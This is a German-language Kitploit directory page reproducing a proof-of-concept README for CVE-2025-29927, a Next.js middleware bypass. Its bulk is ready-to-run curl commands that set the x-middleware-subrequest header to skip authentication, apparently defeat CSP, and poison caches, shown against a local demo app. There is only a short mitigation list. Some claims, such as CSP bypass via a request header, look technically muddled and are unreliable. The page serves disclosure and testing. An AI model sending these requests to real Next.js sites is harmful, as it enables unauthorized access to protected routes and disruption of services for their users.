Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-CVE-2025-29927 — CVE-2025-29927 Proof of Concept | Kitploit
Tools/GitHubGitHub/eve-satoru/poc-cve-2025-29927
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWAF-UmgehungWebsicherheit
GitHubeve-satoru/poc-cve-2025-29927

POC-CVE-2025-29927

CVE-2025-29927 Proof of Concept

Repository anzeigen
31vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-29927: Next.js Middleware-Bypass PoC

Überblick

Dieses PoC demonstriert CVE-2025-29927, eine Schwachstelle in Next.js Middleware, die Angreifern ermöglicht, Authentifizierungs-, Autorisierungs- und CSP-Mechanismen mithilfe des x-middleware-subrequest-Headers zu umgehen.

Betroffene Versionen

Next.js-Versionen 11.1.4 bis 15.1.7

Einrichtung & Installation

1️⃣ Clone & Install the PoC

root@kitploit:~
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev

Die App wird unter http://localhost:3000 gestartet.

Exploitationsszenarien

1️⃣ Umgehung der Authentifizierung und Autorisierung (cURL)

1- Verwende x-middleware-subrequest, um unbefugten Zugriff zu erlangen:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

💥 Erwartetes Ergebnis: Die Antwort gibt admin admin zurück, obwohl die Authentifizierung umgangen wurde.

result screenshot

2️⃣ CSP-Umgehung für XSS-Injection

Wenn CSP über Middleware erzwungen wird, umgehe es:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin

💥 Erwartetes Ergebnis: Das CSP wird ignoriert, was die Ausführung bösartiger Skripte ermöglicht.

3️⃣ Cache-Poisoning-DoS-Angriff (CPDoS)

Nutze Cache-Vergiftung, indem eine fehlerhafte Antwort erzwungen wird:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin

💥 Erwartetes Ergebnis: Die Seite wird mit falschem Inhalt gecached, was normale Nutzer stört.

Maßnahmen zur Schadensbegrenzung

  • ✅ Überprüfe die Middleware-Logik, um eine Umgehung zu verhindern .
  • ✅ Aktualisiere Next.js, sobald eine gepatchte Version veröffentlicht .

Danksagungen

🔍 Entdeckt von: Allam Rachid (zhero;) & Allam Yasser (inzo_)

Tool herunterladen